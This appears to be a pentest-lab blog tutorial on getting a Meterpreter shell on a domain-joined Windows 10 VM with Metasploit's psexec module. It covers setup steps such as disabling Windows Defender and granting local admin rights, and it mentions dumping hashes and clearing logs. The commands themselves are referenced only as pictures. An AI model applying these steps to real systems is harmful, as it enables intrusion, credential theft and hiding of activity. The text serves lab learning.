Getting a Meterpreter session is always a wonderful thing. You can elevate privileges, dump hashes, clear windows logs, download/upload files, and more.
Prerequisites:
- Domain controller with Active Directory setup.
- See this series, to set up your lab environment.
- Kali Linux
- Windows 10 VM, joined to a domain
Setting your environment
On Kali, we’re going to use exploit/windows/smb/psexec on Metasploit to get our Meterpreter session. For that, we’ll need to take some necessary steps to make this work.
Go to your Windows 10 machine that is joined to the domain. Open up File Explorer, and go to your C:\ drive. Right click > New > New Folder. Name the folder “Scans”.
Note: Create this folder while logged in as a domain user, in this example I’m using tgreyjoy (WINTERFELL\tgreyjoy).
Now that we have the new Folder, we need to set sharing enabled for it.
Making your domain user a local administrator
Go ahead and switch users to the domain administrator.
Disable Windows Defender
Believe it or not, not everyone is using Windows Defender. They may not be patching their machines enough and they might be using a different AV software. Because of this, it’s not entirely unrealistic that we’re disabling Windows Defender for this tutorial.
Now that we’ve disabled it for good, restart your Windows 10 VM.
Getting Meterpreter Shell
The above pictures pretty much sum up the commands you’ll need to run to get meterpreter shell with psexec.
Note: You may need to type “show targets” and “set target #” to get this to work.
